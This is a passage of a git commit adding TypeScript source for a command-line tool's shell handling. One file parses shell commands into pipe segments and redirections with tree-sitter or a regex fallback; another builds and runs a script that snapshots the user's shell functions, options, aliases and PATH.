init claude-code

This commit is contained in:
2026-04-01 17:32:37 +02:00
commit 73b208c009
1902 changed files with 513237 additions and 0 deletions
+318
View File
@@ -0,0 +1,318 @@
import memoize from 'lodash-es/memoize.js'
import {
extractOutputRedirections,
splitCommandWithOperators,
} from './commands.js'
import type { Node } from './parser.js'
import {
analyzeCommand,
type TreeSitterAnalysis,
} from './treeSitterAnalysis.js'
/**
 * One output redirection found in a shell command: where the output goes and
 * which redirection operator was used.
 */
export type OutputRedirection = {
// Redirection target text as it appears in the command.
target: string
// Redirection operator; only `>` and `>>` are represented.
operator: '>' | '>>'
}
/**
 * Interface for parsed command implementations.
 * Both tree-sitter and regex fallback implementations conform to this.
 */
export interface IParsedCommand {
/** The command string exactly as it was handed to the parser. */
readonly originalCommand: string
/** Returns the original command string. */
toString(): string
/**
 * Returns the command split at pipe (`|`) operators, one entry per pipeline
 * stage. A command without pipes yields a single entry.
 */
getPipeSegments(): string[]
/**
 * Returns the command text with its output redirections removed, or the
 * original command when it has none.
 */
withoutOutputRedirections(): string
/** Returns the output redirections (`>` / `>>`) found in the command. */
getOutputRedirections(): OutputRedirection[]
/**
 * Returns tree-sitter analysis data if available.
 * Returns null for the regex fallback implementation.
 */
getTreeSitterAnalysis(): TreeSitterAnalysis | null
}
/**
 * @deprecated Legacy regex/shell-quote path. Only used when tree-sitter is
 * unavailable. The primary gate is parseForSecurity (ast.ts).
 *
 * Fallback {@link IParsedCommand} backed by the helpers in `./commands.js`
 * rather than a syntax tree. Exported for testing purposes.
 */
export class RegexParsedCommand_DEPRECATED implements IParsedCommand {
  readonly originalCommand: string

  constructor(command: string) {
    this.originalCommand = command
  }

  /** Returns the original command string. */
  toString(): string {
    return this.originalCommand
  }

  /**
   * Splits the command into pipeline stages by grouping the tokens produced
   * by `splitCommandWithOperators` between `|` tokens and re-joining each
   * group with single spaces. If the splitter throws, or no stage is
   * produced, the whole original command is returned as the only segment.
   */
  getPipeSegments(): string[] {
    const wholeCommand = [this.originalCommand]
    try {
      const segments: string[] = []
      let pending: string[] = []
      // Emits the tokens gathered so far as one segment (empty groups are dropped).
      const flush = (): void => {
        if (pending.length === 0) {
          return
        }
        segments.push(pending.join(' '))
        pending = []
      }
      for (const token of splitCommandWithOperators(this.originalCommand)) {
        if (token === '|') {
          flush()
        } else {
          pending.push(token)
        }
      }
      flush()
      return segments.length === 0 ? wholeCommand : segments
    } catch {
      return wholeCommand
    }
  }

  /**
   * Returns the command with output redirections stripped. The original
   * string is returned untouched when it contains no `>` at all or when the
   * extractor reports no redirections.
   */
  withoutOutputRedirections(): string {
    const command = this.originalCommand
    if (command.includes('>')) {
      const extracted = extractOutputRedirections(command)
      if (extracted.redirections.length > 0) {
        return extracted.commandWithoutRedirections
      }
    }
    return command
  }

  /** Returns the redirections reported by `extractOutputRedirections`. */
  getOutputRedirections(): OutputRedirection[] {
    return extractOutputRedirections(this.originalCommand).redirections
  }

  /** The regex fallback never has tree-sitter data, so this is always null. */
  getTreeSitterAnalysis(): TreeSitterAnalysis | null {
    return null
  }
}
/**
 * An OutputRedirection plus the span of the syntax-tree node it came from.
 * startIndex/endIndex are copied from the tree-sitter `file_redirect` node and
 * are used as offsets into the UTF-8 encoded command when the redirection is
 * cut out of the command text.
 */
type RedirectionNode = OutputRedirection & {
startIndex: number
endIndex: number
}
/**
 * Calls `visitor` on `node` and on every descendant, in depth-first
 * pre-order (a node is visited before its children, children left to right).
 *
 * The walk uses an explicit stack instead of recursion so that a very deeply
 * nested tree cannot overflow the JavaScript call stack.
 *
 * @param node - Root of the subtree to walk.
 * @param visitor - Callback invoked once per node.
 */
function visitNodes(node: Node, visitor: (node: Node) => void): void {
  const stack: Node[] = [node]
  for (
    let current = stack.pop();
    current !== undefined;
    current = stack.pop()
  ) {
    visitor(current)
    // Read children only after the visitor has run (as the recursive version
    // did), and push them in reverse so the leftmost child is popped first.
    const { children } = current
    for (let i = children.length - 1; i >= 0; i--) {
      const child = children[i]
      if (child !== undefined) {
        stack.push(child)
      }
    }
  }
}
/**
 * Collects the start offset of every `|` token that is a direct child of a
 * `pipeline` node anywhere under `rootNode`.
 *
 * @returns The offsets in ascending order.
 */
function extractPipePositions(rootNode: Node): number[] {
  const offsets: number[] = []
  visitNodes(rootNode, current => {
    if (current.type !== 'pipeline') {
      return
    }
    for (const token of current.children) {
      if (token.type === '|') {
        offsets.push(token.startIndex)
      }
    }
  })
  // Offsets are gathered in traversal order, which is not guaranteed to be
  // left-to-right when pipelines are nested inside other constructs (the
  // original note cites `a | b && c | d`). getPipeSegments slices the command
  // left-to-right, so hand it ascending offsets.
  offsets.sort((left, right) => left - right)
  return offsets
}
/**
 * Finds every `file_redirect` node under `rootNode` that has both a `>` or
 * `>>` operator child and a `word` child, and records its operator, target
 * text and node span. Redirect nodes missing either child are ignored.
 */
function extractRedirectionNodes(rootNode: Node): RedirectionNode[] {
  const found: RedirectionNode[] = []
  visitNodes(rootNode, current => {
    if (current.type !== 'file_redirect') {
      return
    }
    const operatorNode = current.children.find(
      child => child.type === '>' || child.type === '>>',
    )
    const targetNode = current.children.find(child => child.type === 'word')
    if (!operatorNode || !targetNode) {
      return
    }
    found.push({
      startIndex: current.startIndex,
      endIndex: current.endIndex,
      target: targetNode.text,
      operator: operatorNode.type as '>' | '>>',
    })
  })
  return found
}
/**
 * IParsedCommand backed by positions extracted from a tree-sitter AST.
 *
 * Tree-sitter's startIndex/endIndex are UTF-8 byte offsets, whereas
 * String.slice() works on UTF-16 code units. The two agree for ASCII but
 * diverge for multi-byte code points (e.g. `—` U+2014 is 3 UTF-8 bytes and
 * 1 code unit), so all slicing is done on a UTF-8 Buffer of the command and
 * the result is decoded back to a string.
 */
class TreeSitterParsedCommand implements IParsedCommand {
  readonly originalCommand: string
  // UTF-8 encoding of originalCommand; every offset below indexes into this.
  private readonly commandBytes: Buffer
  private readonly pipePositions: number[]
  private readonly redirectionNodes: RedirectionNode[]
  private readonly treeSitterAnalysis: TreeSitterAnalysis

  /**
   * @param command - The original command text.
   * @param pipePositions - Byte offsets of `|` tokens, in ascending order.
   * @param redirectionNodes - Output redirections with their byte spans.
   * @param treeSitterAnalysis - Analysis data handed back unchanged by
   *   getTreeSitterAnalysis().
   */
  constructor(
    command: string,
    pipePositions: number[],
    redirectionNodes: RedirectionNode[],
    treeSitterAnalysis: TreeSitterAnalysis,
  ) {
    this.originalCommand = command
    this.commandBytes = Buffer.from(command, 'utf8')
    this.pipePositions = pipePositions
    this.redirectionNodes = redirectionNodes
    this.treeSitterAnalysis = treeSitterAnalysis
  }

  /** Returns the original command string. */
  toString(): string {
    return this.originalCommand
  }

  /**
   * Cuts the command at each recorded pipe offset and returns the trimmed,
   * non-empty pieces. With no pipes the original command is the only entry.
   */
  getPipeSegments(): string[] {
    if (this.pipePositions.length === 0) {
      return [this.originalCommand]
    }
    // Every pipe offset ends a segment; the end of the buffer ends the last.
    const segmentEnds = [...this.pipePositions, this.commandBytes.length]
    const segments: string[] = []
    let from = 0
    for (const to of segmentEnds) {
      const text = this.commandBytes.subarray(from, to).toString('utf8').trim()
      if (text) {
        segments.push(text)
      }
      // Skip the one-byte `|` itself.
      from = to + 1
    }
    return segments
  }

  /**
   * Returns the command with every recorded redirection span removed, then
   * trimmed and with each whitespace run collapsed to a single space.
   */
  withoutOutputRedirections(): string {
    if (this.redirectionNodes.length === 0) {
      return this.originalCommand
    }
    // Remove from the back so earlier offsets stay valid after each cut.
    const backToFront = [...this.redirectionNodes].sort(
      (a, b) => b.startIndex - a.startIndex,
    )
    const stripped = backToFront.reduce<Buffer>(
      (bytes, { startIndex, endIndex }) =>
        Buffer.concat([bytes.subarray(0, startIndex), bytes.subarray(endIndex)]),
      this.commandBytes,
    )
    return stripped.toString('utf8').trim().replace(/\s+/g, ' ')
  }

  /** Returns the redirections without their internal byte spans. */
  getOutputRedirections(): OutputRedirection[] {
    return this.redirectionNodes.map(redirection => ({
      target: redirection.target,
      operator: redirection.operator,
    }))
  }

  /** Returns the analysis object supplied at construction. */
  getTreeSitterAnalysis(): TreeSitterAnalysis {
    return this.treeSitterAnalysis
  }
}
/**
 * Probes once whether the tree-sitter parser can be loaded and can parse a
 * trivial command. The call is memoized, so the probe result is reused for
 * all later calls. Any load or parse failure is reported as `false`.
 */
const getTreeSitterAvailable = memoize(async (): Promise<boolean> => {
  try {
    const parser = await import('./parser.js')
    const probe = await parser.parseCommand('echo test')
    return probe !== null
  } catch {
    return false
  }
})
/**
 * Builds a tree-sitter backed IParsedCommand from an AST root that the
 * caller has already parsed, so the redundant native.parse that
 * ParsedCommand.parse would perform is skipped.
 *
 * @param command - The command text the tree was parsed from.
 * @param root - Root node of the parsed tree.
 */
export function buildParsedCommandFromRoot(
  command: string,
  root: Node,
): IParsedCommand {
  return new TreeSitterParsedCommand(
    command,
    extractPipePositions(root),
    extractRedirectionNodes(root),
    analyzeCommand(root, command),
  )
}
/**
 * Parses `command` into an IParsedCommand.
 *
 * Uses tree-sitter when the availability probe succeeds and the parser
 * returns data; otherwise (probe failed, parser returned nothing, or anything
 * threw) falls back to the regex implementation.
 *
 * @returns null for an empty command, otherwise a parsed command.
 */
async function doParse(command: string): Promise<IParsedCommand | null> {
  if (!command) {
    return null
  }
  const regexFallback = (): IParsedCommand =>
    new RegexParsedCommand_DEPRECATED(command)

  if (!(await getTreeSitterAvailable())) {
    return regexFallback()
  }
  try {
    const parser = await import('./parser.js')
    const parsed = await parser.parseCommand(command)
    if (parsed) {
      // Native NAPI parser returns plain JS objects (no WASM handles);
      // nothing to free — extract directly.
      return buildParsedCommandFromRoot(command, parsed.rootNode)
    }
  } catch {
    // Swallow and use the regex implementation below.
  }
  return regexFallback()
}
// Single-entry cache for ParsedCommand.parse. Legacy callers
// (bashCommandIsSafeAsync, buildSegmentWithoutRedirections) may parse the
// same command string several times in a row; each parse is ~1 native.parse
// plus ~6 tree walks, so remembering the most recent command skips that
// work. Keeping only one entry avoids leaking TreeSitterParsedCommand
// instances.
let lastCmd: string | undefined
let lastResult: Promise<IParsedCommand | null> | undefined

/**
 * ParsedCommand provides methods for working with shell commands.
 * Uses tree-sitter when available for quote-aware parsing,
 * falls back to regex-based parsing otherwise.
 */
export const ParsedCommand = {
  /**
   * Parses a command string, reusing the previous result when the same
   * string is parsed twice in a row.
   *
   * @returns A promise for the parsed command; it resolves to null when
   *   doParse yields nothing (an empty command).
   */
  parse(command: string): Promise<IParsedCommand | null> {
    let result = lastResult
    if (result === undefined || lastCmd !== command) {
      lastCmd = command
      result = doParse(command)
      lastResult = result
    }
    return result
  },
}
+582
View File
@@ -0,0 +1,582 @@
import { execFile } from 'child_process'
import { execa } from 'execa'
import { mkdir, stat } from 'fs/promises'
import * as os from 'os'
import { join } from 'path'
import { logEvent } from 'src/services/analytics/index.js'
import { registerCleanup } from '../cleanupRegistry.js'
import { getCwd } from '../cwd.js'
import { logForDebugging } from '../debug.js'
import {
embeddedSearchToolsBinaryPath,
hasEmbeddedSearchTools,
} from '../embeddedTools.js'
import { getClaudeConfigHomeDir } from '../envUtils.js'
import { pathExists } from '../file.js'
import { getFsImplementation } from '../fsOperations.js'
import { logError } from '../log.js'
import { getPlatform } from '../platform.js'
import { ripgrepCommand } from '../ripgrep.js'
import { subprocessEnv } from '../subprocessEnv.js'
import { quote } from './shellQuote.js'
// A single backslash character. Interpolated into the generated shell script
// where a backslash must appear inside a template literal.
const LITERAL_BACKSLASH = '\\'
// Timeout, in milliseconds, applied to the shell process that creates the snapshot.
const SNAPSHOT_CREATION_TIMEOUT = 10000 // 10 seconds
/**
 * Builds the source of a shell function named `funcName` that runs
 * `binaryPath` with argv[0] set to `argv0`.
 * This relies on the bun-internal ARGV0 dispatch trick: the bun binary checks
 * its argv[0] and runs the embedded tool (rg, bfs, ugrep) that matches.
 *
 * The generated function picks one of three ways to set argv[0]:
 * - zsh, and Windows shells (msys/cygwin/win32): the `ARGV0` environment
 *   variable, because `exec -a` does not work under git bash and the bun
 *   binary reads ARGV0 natively;
 * - bash when `$BASHPID != $$`: `exec -a` directly;
 * - otherwise: `exec -a` wrapped in a subshell.
 *
 * @param funcName - Name of the shell function to define.
 * @param argv0 - Value to present as argv[0].
 * @param binaryPath - Path of the binary; shell-quoted before use.
 * @param prependArgs - Arguments to inject before the user's args (e.g.,
 *   default flags). Injected literally; each element must be a valid shell
 *   word (no spaces/special chars).
 * @returns The function definition as newline-joined shell source.
 */
function createArgv0ShellFunction(
  funcName: string,
  argv0: string,
  binaryPath: string,
  prependArgs: string[] = [],
): string {
  const quotedPath = quote([binaryPath])
  const forwardedArgs =
    prependArgs.length > 0 ? `${prependArgs.join(' ')} "$@"` : '"$@"'
  const invocation = `${quotedPath} ${forwardedArgs}`
  // Shared by the zsh branch and the Windows branch.
  const viaEnvVar = ` ARGV0=${argv0} ${invocation}`

  const lines = [
    `function ${funcName} {`,
    ' if [[ -n $ZSH_VERSION ]]; then',
    viaEnvVar,
    ' elif [[ "$OSTYPE" == "msys" ]] || [[ "$OSTYPE" == "cygwin" ]] || [[ "$OSTYPE" == "win32" ]]; then',
    viaEnvVar,
    ' elif [[ $BASHPID != $$ ]]; then',
    ` exec -a ${argv0} ${invocation}`,
    ' else',
    ` (exec -a ${argv0} ${invocation})`,
    ' fi',
    '}',
  ]
  return lines.join('\n')
}
/**
 * Creates the ripgrep shell integration.
 *
 * When `ripgrepCommand()` reports an `argv0` (embedded, bun-internal
 * ripgrep) the result is a shell function that sets argv[0]. Otherwise it is
 * an alias target: the shell-quoted rg path followed by its shell-quoted
 * default arguments.
 *
 * @returns Object with type and the shell snippet to use
 */
export function createRipgrepShellIntegration(): {
  type: 'alias' | 'function'
  snippet: string
} {
  const { argv0, rgPath, rgArgs } = ripgrepCommand()

  if (argv0) {
    return {
      type: 'function',
      snippet: createArgv0ShellFunction('rg', argv0, rgPath),
    }
  }

  // Quote each word separately, then join: path first, arguments after.
  const quotedWords = [rgPath, ...rgArgs].map(word => quote([word]))
  return { type: 'alias', snippet: quotedWords.join(' ') }
}
/**
 * VCS directories to exclude from grep searches. Matches the list in
 * GrepTool (see GrepTool.ts: VCS_DIRECTORIES_TO_EXCLUDE).
 *
 * Each entry becomes an `--exclude-dir=<name>` flag on the generated `grep`
 * wrapper.
 */
const VCS_DIRECTORIES_TO_EXCLUDE = [
'.git',
'.svn',
'.hg',
'.bzr',
'.jj',
'.sl',
] as const
/**
 * Creates shell integration for `find` and `grep`, backed by bfs and ugrep
 * embedded in the bun binary (ant-native only). Unlike the rg integration,
 * this always shadows the system find/grep since bfs/ugrep are drop-in
 * replacements and we want consistent fast behavior.
 *
 * These wrappers replace the GlobTool/GrepTool dedicated tools (which are
 * removed from the tool registry when embedded search tools are available),
 * so they're tuned to match those tools' semantics, not GNU find/grep.
 *
 * `find` ↔ GlobTool:
 * - Inject `-regextype findutils-default`: bfs defaults to POSIX BRE for
 *   -regex, but GNU find defaults to emacs-flavor (which supports `\|`
 *   alternation). Without this, `find . -regex '.*\.\(js\|ts\)'` silently
 *   returns zero results. A later user-supplied -regextype still overrides.
 * - No gitignore filtering: GlobTool passes `--no-ignore` to rg. bfs has no
 *   gitignore support anyway, so this matches by default.
 * - Hidden files included: both GlobTool (`--hidden`) and bfs's default.
 *
 * Caveat: even with findutils-default, Oniguruma (bfs's regex engine) uses
 * leftmost-first alternation, not POSIX leftmost-longest. Patterns where
 * one alternative is a prefix of another (e.g., `\(ts\|tsx\)`) may miss
 * matches that GNU find catches. Workaround: put the longer alternative first.
 *
 * `grep` ↔ GrepTool (file filtering) + GNU grep (regex syntax):
 * - `-G` (basic regex / BRE): GNU grep defaults to BRE where `\|` is
 *   alternation. ugrep defaults to ERE where `|` is alternation and `\|` is a
 *   literal pipe. Without -G, `grep "foo\|bar"` silently returns zero results.
 *   User-supplied `-E`, `-F`, or `-P` later in argv overrides this.
 * - `--ignore-files`: respect .gitignore (GrepTool uses rg's default, which
 *   respects gitignore). Override with `grep --no-ignore-files`.
 * - `--hidden`: include hidden files (GrepTool passes `--hidden` to rg).
 *   Override with `grep --no-hidden`.
 * - `--exclude-dir` for VCS dirs: GrepTool passes `--glob '!.git'` etc. to rg.
 * - `-I`: skip binary files. rg's recursion silently skips binary matches
 *   by default (different from direct-file-arg behavior); ugrep doesn't, so
 *   we inject -I to match. Override with `grep -a`.
 *
 * Not replicated from GrepTool:
 * - `--max-columns 500`: ugrep's `--width` hard-truncates output which could
 *   break pipelines; rg's version replaces the line with a placeholder.
 * - Read deny rules / plugin cache exclusions: require toolPermissionContext
 *   which isn't available at shell-snapshot creation time.
 *
 * @returns The shell source (two `unalias` lines followed by the `find` and
 *   `grep` function definitions), or null if embedded search tools are not
 *   available in this build.
 */
export function createFindGrepShellIntegration(): string | null {
  if (!hasEmbeddedSearchTools()) {
    return null
  }
  const binaryPath = embeddedSearchToolsBinaryPath()

  const findDefaults = ['-regextype', 'findutils-default']
  const grepDefaults = [
    '-G',
    '--ignore-files',
    '--hidden',
    '-I',
    ...VCS_DIRECTORIES_TO_EXCLUDE.map(dir => `--exclude-dir=${dir}`),
  ]
  const findWrapper = createArgv0ShellFunction(
    'find',
    'bfs',
    binaryPath,
    findDefaults,
  )
  const grepWrapper = createArgv0ShellFunction(
    'grep',
    'ugrep',
    binaryPath,
    grepDefaults,
  )

  // User shell configs may define aliases like `alias find=gfind` or
  // `alias grep=ggrep` (common on macOS with Homebrew GNU tools). The
  // snapshot sources user aliases before these function definitions, and
  // bash expands aliases before function lookup — so a renaming alias would
  // silently bypass the embedded bfs/ugrep dispatch. Clear them first (same
  // fix the rg integration uses).
  const clearAliases = [
    'unalias find 2>/dev/null || true',
    'unalias grep 2>/dev/null || true',
  ]
  return [...clearAliases, findWrapper, grepWrapper].join('\n')
}
/**
 * Picks the rc file that belongs to the given shell and returns its path
 * inside the current user's home directory.
 *
 * The shell is recognised by substring: a path containing `zsh` maps to
 * `.zshrc`, one containing `bash` to `.bashrc`, and anything else to
 * `.profile`.
 *
 * @param shellPath - Path (or name) of the shell binary.
 * @returns Path of the config file under `os.homedir()`.
 */
function getConfigFile(shellPath: string): string {
  let fileName = '.profile'
  if (shellPath.includes('zsh')) {
    fileName = '.zshrc'
  } else if (shellPath.includes('bash')) {
    fileName = '.bashrc'
  }
  return join(os.homedir(), fileName)
}
/**
 * Generates the user-specific part of the snapshot script: shell code that
 * appends the user's functions, shell options and aliases to
 * "$SNAPSHOT_FILE". The script is meant to run after the user's config file
 * has been sourced, so it captures whatever that file defined.
 *
 * @param configFile - Path of the user's shell config file. A path ending in
 *   `.zshrc` selects the zsh variants of the commands; anything else gets the
 *   bash variants.
 * @returns Shell script fragment (not executed here).
 */
function getUserSnapshotContent(configFile: string): string {
  const isZsh = configFile.endsWith('.zshrc')
  let content = ''

  // User functions
  if (isZsh) {
    content += `
echo "# Functions" >> "$SNAPSHOT_FILE"
# Force autoload all functions first
typeset -f > /dev/null 2>&1
# Now get user function names - filter completion functions (single underscore prefix)
# but keep double-underscore helpers (e.g. __zsh_like_cd from mise, __pyenv_init)
typeset +f | grep -vE '^_[^_]' | while read func; do
typeset -f "$func" >> "$SNAPSHOT_FILE"
done
`
  } else {
    // Each bash function is written as an `eval` of its base64-decoded
    // definition, so special characters in the body survive the round trip.
    content += `
echo "# Functions" >> "$SNAPSHOT_FILE"
# Force autoload all functions first
declare -f > /dev/null 2>&1
# Now get user function names - filter completion functions (single underscore prefix)
# but keep double-underscore helpers (e.g. __zsh_like_cd from mise, __pyenv_init)
declare -F | cut -d' ' -f3 | grep -vE '^_[^_]' | while read func; do
# Encode the function to base64, preserving all special characters
encoded_func=$(declare -f "$func" | base64 )
# Write the function definition to the snapshot
echo "eval ${LITERAL_BACKSLASH}"${LITERAL_BACKSLASH}$(echo '$encoded_func' | base64 -d)${LITERAL_BACKSLASH}" > /dev/null 2>&1" >> "$SNAPSHOT_FILE"
done
`
  }

  // Shell options
  if (isZsh) {
    content += `
echo "# Shell Options" >> "$SNAPSHOT_FILE"
setopt | sed 's/^/setopt /' | head -n 1000 >> "$SNAPSHOT_FILE"
`
  } else {
    // `set -o` prints "<name> <on|off>" per option. Select on the state
    // column: matching the substring "on" anywhere on the line would also
    // pick up disabled options whose NAME contains "on" (monitor, onecmd)
    // and write them to the snapshot as enabled.
    content += `
echo "# Shell Options" >> "$SNAPSHOT_FILE"
shopt -p | head -n 1000 >> "$SNAPSHOT_FILE"
set -o | awk '$2 == "on" {print "set -o " $1}' | head -n 1000 >> "$SNAPSHOT_FILE"
echo "shopt -s expand_aliases" >> "$SNAPSHOT_FILE"
`
  }

  // User aliases
  content += `
echo "# Aliases" >> "$SNAPSHOT_FILE"
# Filter out winpty aliases on Windows to avoid "stdin is not a tty" errors
# Git Bash automatically creates aliases like "alias node='winpty node.exe'" for
# programs that need Win32 Console in mintty, but winpty fails when there's no TTY
if [[ "$OSTYPE" == "msys" ]] || [[ "$OSTYPE" == "cygwin" ]]; then
alias | grep -v "='winpty " | sed 's/^alias //g' | sed 's/^/alias -- /' | head -n 1000 >> "$SNAPSHOT_FILE"
else
alias | sed 's/^alias //g' | sed 's/^/alias -- /' | head -n 1000 >> "$SNAPSHOT_FILE"
fi
`
  return content
}
/**
 * Generates Claude Code specific snapshot content
 * This content is always included regardless of user configuration
 *
 * The returned shell fragment appends three things to "$SNAPSHOT_FILE":
 * 1. an `if` block that defines `rg` (alias or function) only when no real
 *    `rg` command is found;
 * 2. the find/grep wrappers, when createFindGrepShellIntegration() provides
 *    them;
 * 3. an `export PATH=...` line.
 *
 * @returns Shell script fragment (not executed here).
 */
async function getClaudeCodeSnapshotContent(): Promise<string> {
// Get the appropriate PATH based on platform
let pathValue = process.env.PATH
if (getPlatform() === 'windows') {
// On Windows with git-bash, read the Cygwin PATH
// `reject: false` makes a failing command report through exitCode instead
// of throwing, so the fallback below is reached.
const cygwinResult = await execa('echo $PATH', {
shell: true,
reject: false,
})
if (cygwinResult.exitCode === 0 && cygwinResult.stdout) {
pathValue = cygwinResult.stdout.trim()
}
// Fall back to process.env.PATH if we can't get Cygwin PATH
}
const rgIntegration = createRipgrepShellIntegration()
let content = ''
// Check if rg is available, if not create an alias/function to bundled ripgrep
// We use a subshell to unalias rg before checking, so that user aliases like
// `alias rg='rg --smart-case'` don't shadow the real binary check. The subshell
// ensures we don't modify the user's aliases in the parent shell.
content += `
# Check for rg availability
echo "# Check for rg availability" >> "$SNAPSHOT_FILE"
echo "if ! (unalias rg 2>/dev/null; command -v rg) >/dev/null 2>&1; then" >> "$SNAPSHOT_FILE"
`
if (rgIntegration.type === 'function') {
// For embedded ripgrep, write the function definition using heredoc
// The heredoc delimiter is quoted, so the shell copies the function body
// into the snapshot verbatim, without expanding anything in it.
content += `
cat >> "$SNAPSHOT_FILE" << 'RIPGREP_FUNC_END'
${rgIntegration.snippet}
RIPGREP_FUNC_END
`
} else {
// For regular ripgrep, write a simple alias
// Each single quote in the snippet becomes '\'' so the snippet can sit
// inside the single-quoted alias value written below.
const escapedSnippet = rgIntegration.snippet.replace(/'/g, "'\\''")
content += `
echo ' alias rg='"'${escapedSnippet}'" >> "$SNAPSHOT_FILE"
`
}
// Close the `if` opened by the availability check above.
content += `
echo "fi" >> "$SNAPSHOT_FILE"
`
// For ant-native builds, shadow find/grep with bfs/ugrep embedded in the bun
// binary. Unlike rg (which only activates if system rg is absent), we always
// shadow find/grep since bfs/ugrep are drop-in replacements and we want
// consistent fast behavior in Claude's shell.
const findGrepIntegration = createFindGrepShellIntegration()
if (findGrepIntegration !== null) {
content += `
# Shadow find/grep with embedded bfs/ugrep (ant-native only)
echo "# Shadow find/grep with embedded bfs/ugrep" >> "$SNAPSHOT_FILE"
cat >> "$SNAPSHOT_FILE" << 'FIND_GREP_FUNC_END'
${findGrepIntegration}
FIND_GREP_FUNC_END
`
}
// Add PATH to the file
// NOTE(review): the quote() output is embedded inside a double-quoted echo
// argument; confirm this stays correct for PATH values containing `"`, `$`
// or backticks.
content += `
# Add PATH to the file
echo "export PATH=${quote([pathValue || ''])}" >> "$SNAPSHOT_FILE"
`
return content
}
/**
 * Assembles the complete shell script that captures the environment into the
 * snapshot file.
 *
 * The script sets SNAPSHOT_FILE, sources the user's config file (when it
 * exists), truncates the snapshot file, writes an `unalias -a` preamble,
 * appends the user-derived and Claude Code content, and finally fails with
 * exit status 1 if the snapshot file does not exist.
 *
 * NOTE(review): `configFile` is placed inside plain double quotes on the
 * `source` line, while `snapshotFilePath` goes through `quote()`. A config
 * path containing `"`, `$` or a backtick would break that line — confirm
 * whether it should be quoted the same way.
 *
 * @param shellPath - Path of the shell binary; selects the config file.
 * @param snapshotFilePath - Where the snapshot is written.
 * @param configFileExists - Whether the user's config file was found.
 * @returns The script text.
 */
async function getSnapshotScript(
  shellPath: string,
  snapshotFilePath: string,
  configFileExists: boolean,
): Promise<string> {
  const configFile = getConfigFile(shellPath)

  let userContent: string
  if (configFileExists) {
    userContent = getUserSnapshotContent(configFile)
  } else if (configFile.endsWith('.zshrc')) {
    userContent = ''
  } else {
    // bash needs alias expansion forced manually; normally
    // getUserSnapshotContent takes care of this.
    userContent = 'echo "shopt -s expand_aliases" >> "$SNAPSHOT_FILE"'
  }

  const sourceLine = configFileExists
    ? `source "${configFile}" < /dev/null`
    : '# No user config file to source'

  const claudeCodeContent = await getClaudeCodeSnapshotContent()

  return `SNAPSHOT_FILE=${quote([snapshotFilePath])}
${sourceLine}
# First, create/clear the snapshot file
echo "# Snapshot file" >| "$SNAPSHOT_FILE"
# When this file is sourced, we first unalias to avoid conflicts
# This is necessary because aliases get "frozen" inside function definitions at definition time,
# which can cause unexpected behavior when functions use commands that conflict with aliases
echo "# Unset all aliases to avoid conflicts with functions" >> "$SNAPSHOT_FILE"
echo "unalias -a 2>/dev/null || true" >> "$SNAPSHOT_FILE"
${userContent}
${claudeCodeContent}
# Exit silently on success, only report errors
if [ ! -f "$SNAPSHOT_FILE" ]; then
echo "Error: Snapshot file was not created at $SNAPSHOT_FILE" >&2
exit 1
fi
`
}
/**
 * Creates and saves the shell environment snapshot by loading the user's shell configuration
 *
 * This function is a critical part of Claude CLI's shell integration strategy. It:
 *
 * 1. Identifies the user's shell config file (.zshrc, .bashrc, etc.)
 * 2. Builds a script that sources this configuration file and runs it in the user's shell
 * 3. Captures the resulting shell environment state including:
 *    - Functions defined in the user's shell configuration
 *    - Shell options and settings that affect command behavior
 *    - Aliases that the user has defined
 *
 * The snapshot is saved to a uniquely named file in the `shell-snapshots` directory under
 * the Claude config home. It can be sourced by subsequent shell commands, ensuring they run
 * with the user's expected environment, aliases, and functions. A cleanup handler is
 * registered to delete the file on graceful shutdown.
 *
 * This approach allows Claude CLI to execute commands as if they were run in the user's
 * interactive shell, while avoiding the overhead of creating a new login shell for each command.
 * It handles both Bash and Zsh shells with their different syntax for functions, options, and aliases.
 *
 * If the snapshot creation fails (e.g., timeout, permissions issues), the CLI will still
 * function but without the user's custom shell environment, potentially missing aliases
 * and functions the user relies on. Failures are logged and reported as analytics events;
 * they are never thrown to the caller.
 *
 * @param binShell - Path of the shell binary used to run the snapshot script
 * @returns Promise that resolves to the snapshot file path or undefined if creation failed
 */
export const createAndSaveSnapshot = async (
binShell: string,
): Promise<string | undefined> => {
// Same substring detection as getConfigFile: zsh first, then bash, else sh.
const shellType = binShell.includes('zsh')
? 'zsh'
: binShell.includes('bash')
? 'bash'
: 'sh'
logForDebugging(`Creating shell snapshot for ${shellType} (${binShell})`)
// NOTE(review): async Promise executor. Errors raised before execFile are
// handled by the try/catch below, but an exception thrown inside the async
// execFile callback (outside its own try blocks) would leave this promise
// unsettled — confirm registerCleanup/logEvent cannot throw.
return new Promise(async resolve => {
try {
const configFile = getConfigFile(binShell)
logForDebugging(`Looking for shell config file: ${configFile}`)
const configFileExists = await pathExists(configFile)
if (!configFileExists) {
logForDebugging(
`Shell config file not found: ${configFile}, creating snapshot with Claude Code defaults only`,
)
}
// Create unique snapshot path with timestamp and random ID
const timestamp = Date.now()
const randomId = Math.random().toString(36).substring(2, 8)
const snapshotsDir = join(getClaudeConfigHomeDir(), 'shell-snapshots')
logForDebugging(`Snapshots directory: ${snapshotsDir}`)
const shellSnapshotPath = join(
snapshotsDir,
`snapshot-${shellType}-${timestamp}-${randomId}.sh`,
)
// Ensure snapshots directory exists
await mkdir(snapshotsDir, { recursive: true })
const snapshotScript = await getSnapshotScript(
binShell,
shellSnapshotPath,
configFileExists,
)
logForDebugging(`Creating snapshot at: ${shellSnapshotPath}`)
logForDebugging(`Execution timeout: ${SNAPSHOT_CREATION_TIMEOUT}ms`)
// The whole script is passed inline as the shell's command string.
execFile(
binShell,
['-c', '-l', snapshotScript],
{
env: {
// With CLAUDE_CODE_DONT_INHERIT_ENV set, the shell starts from only the
// three variables below instead of subprocessEnv().
...((process.env.CLAUDE_CODE_DONT_INHERIT_ENV
? {}
: subprocessEnv()) as typeof process.env),
SHELL: binShell,
GIT_EDITOR: 'true',
CLAUDECODE: '1',
},
timeout: SNAPSHOT_CREATION_TIMEOUT,
maxBuffer: 1024 * 1024, // 1MB buffer
encoding: 'utf8',
},
async (error, stdout, stderr) => {
if (error) {
// Failure path: dump everything useful for diagnosis to the debug log,
// report the error, and resolve with undefined.
const execError = error as Error & {
killed?: boolean
signal?: string
code?: number
}
logForDebugging(`Shell snapshot creation failed: ${error.message}`)
logForDebugging(`Error details:`)
logForDebugging(` - Error code: ${execError?.code}`)
logForDebugging(` - Error signal: ${execError?.signal}`)
logForDebugging(` - Error killed: ${execError?.killed}`)
logForDebugging(` - Shell path: ${binShell}`)
logForDebugging(` - Config file: ${getConfigFile(binShell)}`)
logForDebugging(` - Config file exists: ${configFileExists}`)
